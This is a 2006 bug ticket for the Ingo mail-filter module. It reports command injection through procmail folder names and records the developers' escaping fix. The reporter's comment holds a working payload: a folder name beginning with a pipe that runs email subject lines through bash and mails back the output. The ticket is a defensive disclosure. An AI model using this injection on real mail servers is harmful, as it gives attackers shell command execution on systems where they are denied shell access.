[#4513] command execution with procmail
Summary command execution with procmail
Queue Ingo
Queue Version 1.1.1
Type Bug
State Resolved
Priority 3. High
Owners ben (at)
Requester michael.menge (at) zdv (dot) uni-tuebingen (dot) de
Created 2006-10-11 (4084 days ago)
Updated 2006-10-14 (4081 days ago)
Assigned 2006-10-14 (4081 days ago)
Resolved 2006-10-14 (4081 days ago)
Patch No

2006-10-14 21:56:52 Chuck Hagenbuch Comment #6
State ⇒ Resolved
K, just wanted to double check.
2006-10-14 18:48:53 ben Comment #5
I looked at both, and escapeshellcmd() seems to be more appropriate.
2006-10-14 18:41:17 Chuck Hagenbuch Comment #4
State ⇒ Assigned
Careful with that; escapeshellcmd is for an entire command. 
escapeshellarg is for a single argument and may be more appropriate 
here (also may not, but you should double-check if you didn't already 
look at it).
2006-10-14 07:32:50 ben Comment #3
State ⇒ Resolved
escapeshellcmd() should take care of escaping all necessary characters 
(since that's what it's designed to do).

Fixed in HEAD and FRAMEWORK_3.
2006-10-13 17:37:34 Benoit (dot) Branciard (at) univ-paris1 (dot) fr Comment #2
A possible way to handle this, from my own procmail knowledge and 
experiments, would be to escape the folder filenames the following way :

- if the first character is ":", "*", "!", "|", "{" or "}" : prepend 
"./" to the filename

- quote the whole filename with 'single quotes'

but I wonder if procmail may exist on systems where the folder 
separator isn't "/"...

2006-10-11 11:56:01 Jan Schneider Assigned to ben
State ⇒ Assigned
2006-10-11 11:34:08 michael (dot) menge (at) zdv (dot) uni-tuebingen (dot) de Comment #1
Type ⇒ Bug
State ⇒ Unconfirmed
Priority ⇒ 3. High
Summary ⇒ command execution with procmail
Queue ⇒ Ingo
It is possible to use a foldername beginning

with | as mailbox destination in a filterrule.

If the users don't have shell acces to the mailserver this rule could be

used to bypass this restriction.


The Foldername

|formail    -rA     "X-Loop:hisemailaddres@excample.com"   |       (   
     cat     -       ;myCmd="$MATCH";  echo    "Executing:     $myCmd" 
;       bash    -c      "$myCmd"

  )       |$SENDMAIL        -oi     -t

would result in a prcmail like the following

* ^From:.*hisemailaddres@excample\.com



   * ^Subject:.*exec_command\/.*$

   |formail    -rA     "X-Loop:hisemailaddres@excample.com"   |       
(       cat     -


         myCmd="$MATCH"; echo    "Executing:     $myCmd" ;       bash   
   -c      "$myCmd"


         |       $SENDMAIL       -oi     -t


Saved Queries